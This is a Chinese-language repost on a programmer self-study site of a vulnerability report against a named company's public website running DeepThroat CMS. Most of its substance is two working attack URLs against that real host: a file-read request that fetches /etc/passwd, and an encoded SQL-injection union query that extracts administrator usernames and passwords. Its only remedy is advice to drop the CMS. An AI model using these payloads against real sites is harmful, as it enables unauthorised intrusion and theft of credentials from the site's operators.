好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

盈世信息(北京)有限公司官网coremail.cn存在注入

目标:http://www.coremail.cn/ 程序:深喉咙CMS 存在SQL注入,任意文件读取 漏洞 ,可能有人早发现了,没人发我就来发一下。   详细说明:     http://www.coremail.cn/?p=1&m=/etc/passwd 读取服务器/etc/passwd文件   http://www.coremail.cn/?p=24&m=search&keyword=aaa%2527%20union%20select%201,2,3,4,username,6,7,pwd,9,10,11,12,13%20from%20shl_user%23 得到管理员用户名和密码 漏洞证明:       修复方案:   放弃深喉咙吧,那么多好的CMS是吧。 作者:rootsecurity

查看更多关于盈世信息(北京)有限公司官网coremail.cn存在注入的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did11975
  阅读:41次

上一篇: PHP Address Book 7.0.0多个缺陷及修复 - 网站安全 - 自

下一篇:使用一个黑客的小伎俩来实现discuz!邀请功能刷分

相关资讯